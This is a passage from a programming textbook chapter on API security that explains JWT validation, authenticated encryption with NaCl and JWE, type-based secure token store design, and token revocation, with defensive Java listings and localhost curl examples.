While jwt.io is a great debugging tool, remember that JWTs are
credentials so you should never post JWTs from a production environment
into any website.
6.2.4
Validating a signed JWT
To validate a JWT, you first parse the JWS Compact Serialization format and then use
the JWSVerifier object to verify the signature. The Nimbus MACVerifier will calcu-
late the correct HMAC tag and then compare it to the tag attached to the JWT using a
constant-time equality comparison, just like you did in the HmacTokenStore. The Nim-
bus library also takes care of basic security checks, such as making sure that the algo-
rithm header is compatible with the verifier (preventing the algorithm mix up attacks
The encoded JWT
The decoded header and claims
Paste the Base64-encoded key here.
Indicates if the signature is valid
Figure 6.3
The JWT in the jwt.io debugger. The panels on the right show the decoded
header and payload and let you paste in your key to validate the JWT. Never paste a
JWT or key from a production environment into a website.
194
CHAPTER 6
Self-contained tokens and JWTs
discussed in section 6.2), and that there are no unrecognized critical headers. After
the signature has been verified, you can extract the JWT claims set and verify any con-
straints. In this case, you just need to check that the expected audience value appears
in the audience claim, and then set the token expiry from the JWT expiry time claim.
The TokenController will ensure that the token hasn’t expired. Listing 6.4 shows the
full JWT validation logic. Open the SignedJwtTokenStore.java file and replace the
read() method with the contents of the listing.
@Override
public Optional<Token> read(Request request, String tokenId) {
try {
var jwt = SignedJWT.parse(tokenId);
if (!jwt.verify(verifier)) {
throw new JOSEException("Invalid signature");
}
var claims = jwt.getJWTClaimsSet();
if (!claims.getAudience().contains(audience)) {
throw new JOSEException("Incorrect audience");
}
var expiry = claims.getExpirationTime().toInstant();
var subject = claims.getSubject();
var token = new Token(expiry, subject);
var attrs = claims.getJSONObjectClaim("attrs");
attrs.forEach((key, value) ->
token.attributes.put(key, (String) value));
return Optional.of(token);
} catch (ParseException | JOSEException e) {
return Optional.empty();
}
}
You can now restart the API and use the JWT to create a new social space:
$ curl -H 'Content-Type: application/json' \
-H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ0ZXN
➥ 0IiwiYXVkIjoiaHR0cHM6XC9cL2xvY2FsaG9zdDo0NTY3IiwiZXhwIjoxNTc
➥ 3MDEyMzA3LCJhdHRycyI6e319.JKJnoNdHEBzc8igkzV7CAYfDRJvE7oB2md
➥ 6qcNgc_yM' -d '{"owner":"test","name":"test space"}' \
https://localhost:4567/spaces
{"name":"test space","uri":"/spaces/1"}
Listing 6.4
Validating a signed JWT
Parse the JWT and
verify the HMAC
signature using the
JWSVerifier.
Reject the token if the
audience doesn’t contain
your API’s base URI.
Extract token
attributes from
the remaining
JWT claims.
If the token is invalid,
then return a generic
failure response.
195
Encrypting sensitive attributes
6.3
Encrypting sensitive attributes
A database in your datacenter, protected by firewalls and physical access controls, is a
relatively safe place to store token data, especially if you follow the hardening advice
in the last chapter. Once you move away from a database and start storing data on the
client, that data is much more vulnerable to snooping. Any personal information
about the user included in the token, such as name, date of birth, job role, work loca-
tion, and so on, may be at risk if the token is accidentally leaked by the client or stolen
though a phishing attack or XSS exfiltration. Some attributes may also need to be
kept confidential from the user themselves, such as any attributes that reveal details of
the API implementation. In chapter 7, you’ll also consider third-party client applica-
tions that may not be trusted to know details about who the user is.
Encryption is a complex topic with many potential pitfalls, but it can be used suc-
cessfully if you stick to well-studied algorithms and follow some basic rules. The goal
of encryption is to ensure the confidentiality of a message by converting it into an
obscured form, known as the ciphertext, using a secret key. The algorithm is known as
a cipher. The recipient can then use the same secret key to recover the original plain-
text message. When the sender and recipient both use the same key, this is known as
secret key cryptography. There are also public key encryption algorithms in which the
sender and recipient have different keys, but we won’t cover those in much detail in
this book.
An important principle of cryptography, known as Kerckhoff’s Principle, says that an
encryption scheme should be secure even if every aspect of the algorithm is known, so
long as the key remains secret.
NOTE
You should use only algorithms that have been designed through an
open process with public review by experts, such as the algorithms you’ll use
in this chapter.
Pop quiz
2
Which JWT claim is used to indicate the API server a JWT is intended for?
a
iss
b
sub
c
iat
d
exp
e
aud
f
jti
3
True or False: The JWT alg (algorithm) header can be safely used to determine
which algorithm to use when validating the signature.
The answers are at the end of the chapter.
196
CHAPTER 6
Self-contained tokens and JWTs
There are several secure encryption algorithms in current use, but the most important
is the Advanced Encryption Standard (AES), which was standardized in 2001 after an
international competition, and is widely considered to be very secure. AES is an exam-
ple of a block cipher, which takes a fixed size input of 16 bytes and produces a 16-byte
encrypted output. AES keys are either 128 bits, 192 bits, or 256 bits in size. To encrypt
more (or less) than 16 bytes with AES, you use a block cipher mode of operation. The
choice of mode of operation is crucial to the security as demonstrated in figure 6.4,
which shows an image of a penguin encrypted with the same AES key but with two dif-
ferent modes of operation.1 The Electronic Code Book (ECB) mode is completely
insecure and leaks a lot of details about the image, while the more secure Counter
Mode (CTR) eliminates any details and looks like random noise.
DEFINITION
A block cipher encrypts a fixed-sized block of input to produce a
block of output. The AES block cipher operates on 16-byte blocks. A block
cipher mode of operation allows a fixed-sized block cipher to be used to encrypt
messages of any length. The mode of operation is critical to the security of the
encryption process.
1 This is a very famous example known as the ECB Penguin. You’ll find the same example in many introductory
cryptography books.
Original image
Encrypted with AES-ECB
Encrypted with AES-CTR
Figure 6.4
An image of the Linux mascot, Tux, that has been encrypted by AES
in ECB mode. The shape of the penguin and many features are still visible despite
the encryption. By contrast, the same image encrypted with AES in CTR mode is
indistinguishable from random noise. (Original image by Larry Ewing and The GIMP,
https://commons.wikimedia.org/wiki/File:Tux.svg.)
197
Encrypting sensitive attributes
6.3.1
Authenticated encryption
Many encryption algorithms only ensure the confidentiality of data that has been
encrypted and don’t claim to protect the integrity of that data. This means that an
attacker won’t be able to read any sensitive attributes in an encrypted token, but they
may be able to alter them. For example, if you know that a token is encrypted with
CTR mode and (when decrypted) starts with the string user=brian, you can change
this to read user=admin by simple manipulation of the ciphertext even though you
can’t decrypt the token. Although there isn’t room to go into the details here, this
kind of attack is often covered in cryptography tutorials under the name chosen cipher-
text attack.
DEFINITION
A chosen ciphertext attack is an attack against an encryption scheme
in which an attacker manipulates the encrypted ciphertext.
In terms of threat models from chapter 1, encryption protects against information dis-
closure threats, but not against spoofing or tampering. In some cases, confidentiality
can also be lost if there is no guarantee of integrity because an attacker can alter a
message and then see what error message is generated when the API tries to decrypt
it. This often leaks information about what the message decrypted to.
LEARN MORE
You can learn more about how modern encryption algorithms
work, and attacks against them, from an up-to-date introduction to cryptogra-
phy book such as Serious Cryptography by Jean-Philippe Aumasson (No Starch
Press, 2018).
To protect against spoofing and tampering threats, you should always use algorithms
that provide authenticated encryption. Authenticated encryption algorithms combine an
encryption algorithm for hiding sensitive data with a MAC algorithm, such as HMAC,
to ensure that the data can’t be altered or faked.
DEFINITION
Authenticated encryption combines an encryption algorithm with
a MAC. Authenticated encryption ensures confidentiality and integrity of
messages.
One way to do this would be to combine a secure encryption scheme like AES in CTR
mode with HMAC. For example, you might make an EncryptedTokenStore that
encrypts data using AES and then combine that with the existing HmacTokenStore for
authentication. But there are two ways you could combine these two stores: first
encrypting and then applying HMAC, or, first applying HMAC and then encrypting
the token and the tag together. It turns out that only the former is generally secure
and is known as Encrypt-then-MAC (EtM). Because it is easy to get this wrong, cryptog-
raphers have developed several dedicated authenticated encryption modes, such as
Galois/Counter Mode (GCM) for AES. JOSE supports both GCM and EtM encryption
modes, which you’ll examine in section 6.3.3, but we’ll begin by looking at a simpler
alternative.
198
CHAPTER 6
Self-contained tokens and JWTs
6.3.2
Authenticated encryption with NaCl
Because cryptography is complex with many subtle details to get right, a recent trend
has been for cryptography libraries to provide higher-level APIs that hide many of
these details from developers. The most well-known of these is the Networking and
Cryptography Library (NaCl; https://nacl.cr.yp.to) designed by Daniel Bernstein. NaCl
(pronounced “salt,” as in sodium chloride) provides high-level operations for authen-
ticated encryption, digital signatures, and other cryptographic primitives but hides
many of the details of the algorithms being used. Using a high-level library designed
by experts such as NaCl is the safest option when implementing cryptographic protec-
tions for your APIs and can be significantly easier to use securely than alternatives.
TIP
Other cryptographic libraries designed to be hard to misuse include
Google’s Tink (https://github.com/google/tink) and Themis from Cossack
Labs (https://github.com/cossacklabs/themis). The Sodium library (https://
libsodium.org) is a widely used clone of NaCl in C that provides many additional
extensions and a simplified API with bindings for Java and other languages.
In this section, you’ll use a pure Java implementation of NaCl called Salty Coffee
(https://github.com/NeilMadden/salty-coffee), which provides a very simple and
Java-friendly API with acceptable performance.2 To add the library to the Natter API
project, open the pom.xml file in the root folder of the Natter API project and add
the following lines to the dependencies section:
<dependency>
<groupId>software.pando.crypto</groupId>
<artifactId>salty-coffee</artifactId>
<version>1.0.2</version>
</dependency>
Listing 6.5 shows an EncryptedTokenStore implemented using the Salty Coffee library’s
SecretBox class, which provides authenticated encryption. Like the HmacTokenStore,
you can delegate creating the token to another store, allowing this to be wrapped
around the JsonTokenStore or another format. Encryption is then performed with
the SecretBox.encrypt() method. This method returns a SecretBox object, which
has methods for getting the encrypted ciphertext and the authentication tag. The
toString() method encodes these components into a URL-safe string that you can use
directly as the token ID. To decrypt the token, you can use the SecretBox.from-
String() method to recover the SecretBox from the encoded string, and then use the
decryptToString() method to decrypt it and get back the original token ID. Navigate
to the src/main/java/com/manning/apisecurityinaction/token folder again and cre-
ate a new file named EncryptedTokenStore.java with the contents of listing 6.5.
2 I wrote Salty Coffee, reusing cryptographic code from Google's Tink library, to provide a simple pure Java
solution. Bindings to libsodium are generally faster if you can use a native library.
199
Encrypting sensitive attributes
package com.manning.apisecurityinaction.token;
import java.security.Key;
import java.util.Optional;
import software.pando.crypto.nacl.SecretBox;
import spark.Request;
public class EncryptedTokenStore implements TokenStore {
private final TokenStore delegate;
private final Key encryptionKey;
public EncryptedTokenStore(TokenStore delegate, Key encryptionKey) {
this.delegate = delegate;
this.encryptionKey = encryptionKey;
}
@Override
public String create(Request request, Token token) {
var tokenId = delegate.create(request, token);
return SecretBox.encrypt(encryptionKey, tokenId).toString();
}
@Override
public Optional<Token> read(Request request, String tokenId) {
var box = SecretBox.fromString(tokenId);
var originalTokenId = box.decryptToString(encryptionKey);
return delegate.read(request, originalTokenId);
}
@Override
public void revoke(Request request, String tokenId) {
var box = SecretBox.fromString(tokenId);
var originalTokenId = box.decryptToString(encryptionKey);
delegate.revoke(request, originalTokenId);
}
}
As you can see, the EncryptedTokenStore using SecretBox is very short because the
library takes care of almost all details for you. To use the new store, you’ll need to gen-
erate a new key to use for encryption rather than reusing the existing HMAC key.
PRINCIPLE
A cryptographic key should only be used for a single purpose. Use
separate keys for different functionality or algorithms.
Because Java’s keytool command doesn’t support generating keys for the encryption
algorithm that SecretBox uses, you can instead generate a standard AES key and then
convert it as the two key formats are identical. SecretBox only supports 256-bit keys,
Listing 6.5
An EncryptedTokenStore
Call the delegate
TokenStore to
generate the
token ID.
Use the SecretBox.encrypt()
method to encrypt the token.
Decode and
decrypt
the box and
then use
the original
token ID.
200
CHAPTER 6
Self-contained tokens and JWTs
so run the following command in the root folder of the Natter API project to add a
new AES key to the existing keystore:
keytool -genseckey -keyalg AES -keysize 256 \
-alias aes-key -keystore keystore.p12 -storepass changeit
You can then load the new key in the Main class just as you did for the HMAC key in
chapter 5. Open Main.java in your editor and locate the lines that load the HMAC key
from the keystore and add a new line to load the AES key:
var macKey = keyStore.getKey("hmac-key", keyPassword);
var encKey = keyStore.getKey("aes-key", keyPassword);
You can convert the key into the correct format with the SecretBox.key() method,
passing in the raw key bytes, which you can get by calling encKey.getEncoded(). Open
the Main.java file again and update the code that constructs the TokenController to
convert the key and use it to create an EncryptedTokenStore, wrapping a JsonToken-
Store, instead of the previous JWT-based implementation:
var naclKey = SecretBox.key(encKey.getEncoded());
var tokenStore = new EncryptedTokenStore(
new JsonTokenStore(), naclKey);
var tokenController = new TokenController(tokenStore);
You can now restart the API and login again to get a new encrypted token.
6.3.3
Encrypted JWTs
NaCl’s SecretBox is hard to beat for simplicity and security, but there is no standard
for how encrypted tokens are formatted into strings and different libraries may use
different formats or leave this up to the application. This is not a problem when
tokens are only consumed by the same API that generated them but can become an
issue if tokens are shared between many APIs, developed by separate teams in differ-
ent programming languages. A standard format such as JOSE becomes more compel-
ling in these cases. JOSE supports several authenticated encryption algorithms in the
JSON Web Encryption (JWE) standard.
An encrypted JWT using the JWE Compact Serialization looks superficially like the
HMAC JWTs from section 6.2, but there are more components reflecting the more
complex structure of an encrypted token, shown in figure 6.5. The five components of
a JWE are:
1
The JWE header, which is very like the JWS header, but with two additional
fields: enc, which specifies the encryption algorithm, and zip, which specifies
an optional compression algorithm to be applied before encryption.
The existing HMAC key
The new AES key
Convert the key to
the correct format.
Construct the
EncryptedToken-
Store wrapping a
JsonTokenStore.
201
Encrypting sensitive attributes
2
An optional encrypted key. This is used in some of the more complex encryp-
tion algorithms. It is empty for the direct symmetric encryption algorithm that
is covered in this chapter.
3
The initialization vector or nonce used when encrypting the payload. Depending
on the encryption method being used, this will be either a 12- or 16-byte ran-
dom binary value that has been Base64url-encoded.
4
The encrypted ciphertext.
5
The MAC authentication tag.
DEFINITION
An initialization vector (IV) or nonce (number-used-once) is a
unique value that is provided to the cipher to ensure that ciphertext is always
different even if the same message is encrypted more than once. The IV
should be generated using a java.security.SecureRandom or other cryp-
tographically-secure pseudorandom number generator (CSPRNG).3 An IV
doesn’t need to be kept secret.
JWE divides specification of the encryption algorithm into two parts:
The enc header describes the authenticated encryption algorithm used to
encrypt the payload of the JWE.
The alg header describes how the sender and recipient agree on the key used
to encrypt the content.
There are a wide variety of key management algorithms for JWE, but for this chapter
you will stick to direct encryption with a secret key. For direct encryption, the algo-
rithm header is set to dir (direct). There are currently two available families of
encryption methods in JOSE, both of which provide authenticated encryption:
A128GCM, A192GCM, and A256GCM use AES in Galois Counter Mode (GCM).
A128CBC-HS256, A192CBC-HS384, and A256CBC-HS512 use AES in Cipher Block
Chaining (CBC) mode together with either HMAC in an EtM configuration as
described in section 6.3.1.
3 A nonce only needs to be unique and could be a simple counter. However, synchronizing a counter across
many servers is difficult and error-prone so it’s best to always use a random value.
eyJ0eXAiOiJKV..bbnRT0wPQv1OLt2Au0DDDQ.C6LMXpsucKYwXpyzhmj.N5CxXQBQMIh
Header
Ciphertext
Authentication
tag
Encrypted key
Initialization vector
Figure 6.5
A JWE in Compact Serialization consists of 5 components: a header, an
encrypted key (blank in this case), an initialization vector or nonce, the encrypted
ciphertext, and then the authentication tag. Each component is URL-safe Base64-
encoded. Values have been truncated for display.
202
CHAPTER 6
Self-contained tokens and JWTs
DEFINITION
All the encryption algorithms allow the JWE header and IV to be
included in the authentication tag without being encrypted. These are known
as authenticated encryption with associated data (AEAD) algorithms.
GCM was designed for use in protocols like TLS where a unique session key is negoti-
ated for each session and a simple counter can be used for the nonce. If you reuse a
nonce with GCM then almost all security is lost: an attacker can recover the MAC key
and use it to forge tokens, which is catastrophic for authentication tokens. For this
reason, I prefer to use CBC with HMAC for directly encrypted JWTs, but for other
JWE algorithms GCM is an excellent choice and very fast.
CBC requires the input to be padded to a multiple of the AES block size (16 bytes),
and this historically has led to a devastating vulnerability known as a padding oracle
attack, which allows an attacker to recover the full plaintext just by observing the dif-
ferent error messages when an API tries to decrypt a token they have tampered with.
The use of HMAC in JOSE prevents this kind of tampering and largely eliminates the
possibility of padding oracle attacks, and the padding has some security benefits.
WARNING
You should avoid revealing the reason why decryption failed to the
callers of your API to prevent oracle attacks like the CBC padding oracle attack.
What key size should you use?
AES allows keys to be in one of three different sizes: 128-bit, 192-bit, or 256-bit. In
principle, correctly guessing a 128-bit key is well beyond the capability of even an
attacker with enormous amounts of computing power. Trying every possible value of
a key is known as a brute-force attack and should be impossible for a key of that size.
There are three exceptions in which that assumption might prove to be wrong:
A weakness in the encryption algorithm might be discovered that reduces the
amount of effort required to crack the key. Increasing the size of the key pro-
vides a security margin against such a possibility.
New types of computers might be developed that can perform brute-force
searches much quicker than existing computers. This is believed to be true of
quantum computers, but it’s not known whether it will ever be possible to
build a large enough quantum computer for this to be a real threat. Doubling
the size of the key protects against known quantum attacks for symmetric
algorithms like AES.
Theoretically, if each user has their own encryption key and you have millions
of users, it may be possible to attack every key simultaneously for less effort
than you would expect from naively trying to break them one at a time. This is
known as a batch attack and is described further in https://blog.cr.yp.to/
20151120-batchattacks.html.
At the time of writing, none of these attacks are practical for AES, and for short-lived
authentication tokens the risk is significantly less, so 128-bit keys are perfectly safe.
On the other hand, modern CPUs have special instructions for AES encryption so
there’s very little extra cost for 256-bit keys if you want to eliminate any doubt.
203
Encrypting sensitive attributes
6.3.4
Using a JWT library
Due to the relative complexity of producing and consuming encrypted JWTs com-
pared to HMAC, you’ll continue using the Nimbus JWT library in this section.
Encrypting a JWT with Nimbus requires a few steps, as shown in listing 6.6.
First you build a JWT claims set using the convenient JWTClaimsSet.Builder class.
You can then create a JWEHeader object to specify the algorithm and encryption
method.
Finally, you encrypt the JWT using a DirectEncrypter object initialized with
the AES key.
The serialize() method on the EncryptedJWT object will then return the JWE Com-
pact Serialization. Navigate to src/main/java/com/manning/apisecurityinaction/token
and create a new file name EncryptedJwtTokenStore.java. Type in the contents of list-
ing 6.6 to create the new token store and save the file. As for the JsonTokenStore,
leave the revoke method blank for now. You’ll fix that in section 6.6.
package com.manning.apisecurityinaction.token;
import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.*;
import com.nimbusds.jwt.*;
import spark.Request;
import javax.crypto.SecretKey;
import java.text.ParseException;
import java.util.*;
public class EncryptedJwtTokenStore implements TokenStore {
private final SecretKey encKey;
public EncryptedJwtTokenStore(SecretKey encKey) {
this.encKey = encKey;
}
@Override
public String create(Request request, Token token) {
var claimsBuilder = new JWTClaimsSet.Builder()
.subject(token.username)
.audience("https://localhost:4567")
.expirationTime(Date.from(token.expiry));
token.attributes.forEach(claimsBuilder::claim);
Remember that the JWE CBC with HMAC methods take a key that is twice the size as
normal. For example, the A128CBC-HS256 method requires a 256-bit key, but this is
really two 128-bit keys joined together rather than a true 256-bit key.
Listing 6.6
The EncryptedJwtTokenStore
Build the JWT
claims set.
204
CHAPTER 6
Self-contained tokens and JWTs
var header = new JWEHeader(JWEAlgorithm.DIR,
EncryptionMethod.A128CBC_HS256);
var jwt = new EncryptedJWT(header, claimsBuilder.build());
try {
var encrypter = new DirectEncrypter(encKey);
jwt.encrypt(encrypter);
} catch (JOSEException e) {
throw new RuntimeException(e);
}
return jwt.serialize();
}
@Override
public void revoke(Request request, String tokenId) {
}
}
Processing an encrypted JWT using the library is just as simple as creating one. First,
you parse the encrypted JWT and then decrypt it using a DirectDecrypter initialized
with the AES key, as shown in listing 6.7. If the authentication tag validation fails
during decryption, then the library will throw an exception. To further reduce the
possibility of padding oracle attacks in CBC mode, you should never return any details
about why decryption failed to the user, so just return an empty Optional here as if no
token had been supplied. You can log the exception details to a debug log that is only
accessible to system administrators if you wish. Once the JWT has been decrypted, you
can extract and validate the claims from the JWT. Open EncryptedJwtTokenStore.java
in your editor again and implement the read method as in listing 6.7.
@Override
public Optional<Token> read(Request request, String tokenId) {
try {
var jwt = EncryptedJWT.parse(tokenId);
var decryptor = new DirectDecrypter(encKey);
jwt.decrypt(decryptor);
var claims = jwt.getJWTClaimsSet();
if (!claims.getAudience().contains("https://localhost:4567")) {
return Optional.empty();
}
var expiry = claims.getExpirationTime().toInstant();
var subject = claims.getSubject();
var token = new Token(expiry, subject);
var ignore = Set.of("exp", "sub", "aud");
for (var attr : claims.getClaims().keySet()) {
if (ignore.contains(attr)) continue;
token.attributes.put(attr, claims.getStringClaim(attr));
}
Listing 6.7
The JWT read method
Create the JWE header
and assemble the
header and claims.
Encrypt the
JWT using the
AES key in direct
encryption mode.
Return the Compact
Serialization of the
encrypted JWT.
Parse the
encrypted
JWT.
Decrypt and
authenticate
the JWT using the
DirectDecrypter.
Extract any
claims from
the JWT.
205
Encrypting sensitive attributes
return Optional.of(token);
} catch (ParseException | JOSEException e) {
return Optional.empty();
}
}
You can now update the main method to switch to using the EncryptedJwtToken-
Store, replacing the previous EncryptedTokenStore. You can reuse the AES key that
you generated in section 6.3.2, but you’ll need to cast it to the more specific
javax.crypto.SecretKey class that the Nimbus library expects. Open Main.java and
update the code to create the token controller again:
TokenStore tokenStore = new EncryptedJwtTokenStore(
(SecretKey) encKey);
var tokenController = new TokenController(tokenStore);
Restart the API and try it out:
$ curl -H 'Content-Type: application/json' \
-u test:password -X POST https://localhost:4567/sessions
{"token":"eyJlbmMiOiJBMjU2R0NNIiwiYWxnIjoiZGlyIn0..hAOoOsgfGb8yuhJD
➥ .kzhuXMMGunteKXz12aBSnqVfqtlnvvzqInLqp83zBwUW_rqWoQp5wM_q2D7vQxpK
➥ TaQR4Nuc-D3cPcYt7MXAJQ.ZigZZclJPDNMlP5GM1oXwQ"}
Compressed tokens
The encrypted JWT is a bit larger than either a simple HMAC token or the NaCl tokens
from section 6.3.2. JWE supports optional compression of the JWT Claims Set before
encryption, which can significantly reduce the size for complex tokens. But combining
encryption and compression can lead to security weaknesses. Most encryption algo-
rithms do not hide the length of the plaintext message that was encrypted, and com-
pression reduces the size of a message based on its content. For example, if two
parts of a message are identical, then it may combine them to remove the duplica-
tion. If an attacker can influence part of a message, they may be able to guess the
rest of the contents by seeing how much it compresses. The CRIME and BREACH
attacks (http://breachattack.com) against TLS were able to exploit this leak of infor-
mation from compression to steal session cookies from compressed HTTP pages.
These kinds of attacks are not always a risk, but you should carefully consider the
possibility before enabling compression. Unless you really need to save space, you
should leave compression disabled.
Pop quiz
4
Which STRIDE threats does authenticated encryption protect against? (There are
multiple correct answers.)
a
Spoofing
b
Tampering
Never reveal the cause
of a decryption failure
to the user.
Cast the key to the more
specific SecretKey class.
206
CHAPTER 6
Self-contained tokens and JWTs
6.4
Using types for secure API design
Imagine that you have implemented token storage using the kit of parts that you devel-
oped in this chapter, creating a JsonTokenStore and wrapping it in an Encrypted-
TokenStore to add authenticated encryption, providing both confidentiality and
authenticity of tokens. But it would be easy for somebody to accidentally remove the
encryption if they simply commented out the EncryptedTokenStore wrapper in the
main method, losing both security properties. If you’d developed the Encrypted-
TokenStore using an unauthenticated encryption scheme such as CTR mode and
then manually combined it with the HmacTokenStore, the risk would be even greater
because not every way of combining those two stores is secure, as you learned in sec-
tion 6.3.1.
The kit-of-parts approach to software design is often appealing to software engi-
neers, because it results in a neat design with proper separation of concerns and maxi-
mum reusability. This was useful when you could reuse the HmacTokenStore, originally
designed to protect database-backed tokens, to also protect JSON tokens stored on
the client. But a kit-of-parts design is opposed to security if there are many insecure
ways to combine the parts and only a few that are secure.
PRINCIPLE
Secure API design should make it very hard to write insecure
code. It is not enough to merely make it possible to write secure code,
because developers will make mistakes.
You can make a kit-of-parts design harder to misuse by using types to enforce the secu-
rity properties you need, as shown in figure 6.6. Rather than all the individual token
(continued)
c
Repudiation
d
Information disclosure
e
Denial of service
f
Elevation of privilege
5
What is the purpose of the initialization vector (IV) in an encryption algorithm?
a
It’s a place to add your name to messages.
b
It slows down decryption to prevent brute force attacks.
c
It increases the size of the message to ensure compatibility with different
algorithms.
d
It ensures that the ciphertext is always different even if a duplicate message
is encrypted.
6
True or False: An IV should always be generated using a secure random number
generator.
The answers are at the end of the chapter.
207
Using types for secure API design
stores implementing a generic TokenStore interface, you can define marker interfaces
that describe the security properties of the implementation. A ConfidentialToken-
Store ensures that token state is kept secret, while an AuthenticatedTokenStore
ensures that the token cannot be tampered with or faked. We can then define a Secure-
TokenStore that is a sub-type of each of the security properties that we want to enforce.
In this case, you want the token controller to use a token store that is both confidential
and authenticated. You can then update the TokenController to require a Secure-
TokenStore, enforcing that an insecure implementation is not used by mistake.
DEFINITION
A marker interface is an interface that defines no new methods. It
is used purely to indicate that the implementation has certain desirable
properties.
Navigate to src/main/java/com/manning/apisecurityinaction/token and add the three
new marker interfaces, as shown in listing 6.8. Create three separate files, Confidential-
TokenStore.java, AuthenticatedTokenStore.java, and SecureTokenStore.java to hold
the three new interfaces.
+create(...)
+read(...)
TokenStore
ConfidentialTokenStore
AuthenticatedTokenStore
SecureTokenStore
The TokenStore interface
provides the basic operations.
Marker interfaces
are used to indicate
security properties.
Define a SecureTokenStore
as a combination of the
desired security goals.
Figure 6.6
You can use marker interfaces to indicate the security properties
of your individual token stores. If a store provides only confidentiality, it should
implement the ConfidentialTokenStore interface. You can then define a
SecureTokenStore by subtyping the desired combination of security properties.
In this case, it ensures both confidentiality and authentication.
208
CHAPTER 6
Self-contained tokens and JWTs
package com.manning.apisecurityinaction.token;
public interface ConfidentialTokenStore extends TokenStore {
}
package com.manning.apisecurityinaction.token;
public interface AuthenticatedTokenStore extends TokenStore {
}
package com.manning.apisecurityinaction.token;
public interface SecureTokenStore extends ConfidentialTokenStore,
AuthenticatedTokenStore {
}
You can now change each of the token stores to implement an appropriate interface:
If you assume that the backend cookie storage is secure against injection and
other attacks, then the CookieTokenStore can be updated to implement the
SecureTokenStore interface.
If you’ve followed the hardening advice from chapter 5, the DatabaseToken-
Store can also be marked as a SecureTokenStore. If you want to ensure that it
is always used with HMAC for extra protection against tampering, then mark it
as only confidential.
The JsonTokenStore is completely insecure on its own, so leave it implement-
ing the base TokenStore interface.
The SignedJwtTokenStore provides no confidentiality for claims in the JWT, so
it should only implement the AuthenticatedTokenStore interface.
The HmacTokenStore turns any TokenStore into an AuthenticatedTokenStore.
But if the underlying store is already confidential, then the result is a Secure-
TokenStore. You can reflect this difference in code by making the HmacToken-
Store constructor private and providing two static factory methods instead, as
shown in listing 6.9. If the underlying store is confidential, then the first method
will return a SecureTokenStore. For anything else, the second method will be
called and return only an AuthenticatedTokenStore.
The EncryptedTokenStore and EncryptedJwtTokenStore can both be changed
to implement SecureTokenStore because they both provide authenticated
encryption that achieves the combined security goals no matter what underly-
ing store is passed in.
Listing 6.8
The secure marker interfaces
The ConfidentialTokenStore marker interface
should go in ConfidentialTokenStore.java.
The AuthenticatedTokenStore should
go in AuthenticatedTokenStore.java.
The SecureTokenStore combines them
and goes in SecureTokenStore.java.
209
Handling token revocation
public class HmacTokenStore implements SecureTokenStore {
private final TokenStore delegate;
private final Key macKey;
private HmacTokenStore(TokenStore delegate, Key macKey) {
this.delegate = delegate;
this.macKey = macKey;
}
public static SecureTokenStore wrap(ConfidentialTokenStore store,
Key macKey) {
return new HmacTokenStore(store, macKey);
}
public static AuthenticatedTokenStore wrap(TokenStore store,
Key macKey) {
return new HmacTokenStore(store, macKey);
}
You can now update the TokenController class to require a SecureTokenStore to be
passed to it. Open TokenController.java in your editor and update the constructor to
take a SecureTokenStore:
public TokenController(SecureTokenStore tokenStore) {
this.tokenStore = tokenStore;
}
This change makes it much harder for a developer to accidentally pass in an imple-
mentation that doesn’t meet your security goals, because the code will fail to type-
check. For example, if you try to pass in a plain JsonTokenStore, then the code will
fail to compile with a type error. These marker interfaces also provide valuable docu-
mentation of the expected security properties of each implementation, and a guide
for code reviewers and security audits to check that they achieve them.
6.5
Handling token revocation
Stateless self-contained tokens such as JWTs are great for moving state out of the data-
base. On the face of it, this increases the ability to scale up the API without needing
additional database hardware or more complex deployment topologies. It’s also much
easier to set up a new API with just an encryption key rather than needing to deploy a
new database or adding a dependency on an existing one. After all, a shared token
database is a single point of failure. But the Achilles’ heel of stateless tokens is how to
handle token revocation. If all the state is on the client, it becomes much harder to
invalidate that state to revoke a token. There is no database to delete the token from.
There are a few ways to handle this. First, you could just ignore the problem and
not allow tokens to be revoked. If your tokens are short-lived and your API does not
handle sensitive data or perform privileged operations, then you might be comfortable
Listing 6.9
Updating the HmacTokenStore
Mark the
HmacTokenStore
as secure.
Make the
constructor
private.
When passed a
ConfidentialTokenStore,
returns a SecureTokenStore.
When passed
any other
TokenStore,
returns an
Authenticated-
TokenStore.
210
CHAPTER 6
Self-contained tokens and JWTs
with the risk of not letting users explicitly log out. But few APIs fit this description;
almost all data is sensitive to somebody. This leaves several options, almost all of which
involve storing some state on the server after all:
You can add some minimal state to the database that lists a unique ID associated
with the token. To revoke a JWT, you delete the corresponding record from the
database. To validate the JWT, you must now perform a database lookup to
check if the unique ID is still in the database. If it is not, then the token has
been revoked. This is known as an allowlist.4
A twist on the above scheme is to only store the unique ID in the database when
the token is revoked, creating a blocklist of revoked tokens. To validate, make
sure that there isn’t a matching record in the database. The unique ID only
needs to be blocked until the token expires, at which point it will be invalid any-
way. Using short expiry times helps keep the blocklist small.
Rather than blocking individual tokens, you can block certain attributes of a set
of tokens. For example, it is a common security practice to invalidate all of a
user’s existing sessions when they change their password. Users often change
their password when they believe somebody else may have accessed their
account, so invalidating any existing sessions will kick the attacker out. Because
there is no record of the existing sessions on the server, you could instead
record an entry in the database saying that all tokens issued to user Mary before
lunchtime on Friday should be considered invalid. This saves space in the data-
base at the cost of increased query complexity.
Finally, you can issue short-lived tokens and force the user to reauthenticate
regularly. This limits the damage that can be done with a compromised token
without needing any additional state on the server but provides a poor user
experience. In chapter 7, you’ll use OAuth2 refresh tokens to provide a more
transparent version of this pattern.
6.5.1
Implementing hybrid tokens
The existing DatabaseTokenStore can be used to implement a list of valid JWTs, and
this is the simplest and most secure default for most APIs. While this involves giving up
on the pure stateless nature of a JWT architecture, and may initially appear to offer
the worst of both worlds—reliance on a centralized database along with the risky
nature of client-side state—in fact, it offers many advantages over each storage strategy
on its own:
Database tokens can be easily and immediately revoked. In September 2018, Face-
book was hit by an attack that exploited a vulnerability in some token-handling
code to quickly gain access to the accounts of many users (https://newsroom
.fb.com/news/2018/09/security-update/). In the wake of the attack, Facebook
4 The terms allowlist and blocklist are now preferred over the older terms whitelist and blacklist due to negative
connotations associated with the old terms.
211
Handling token revocation
revoked 90 million tokens, forcing those users to reauthenticate. In a disaster situ-
ation, you don’t want to be waiting hours for tokens to expire or suddenly finding
scalability issues with your blocklist when you add 90 million new entries.
On the other hand, plain database tokens may be vulnerable to token theft and
forgery if the database is compromised, as described in section 5.3 of chapter 5.
In that chapter, you hardened database tokens by using the HmacTokenStore to
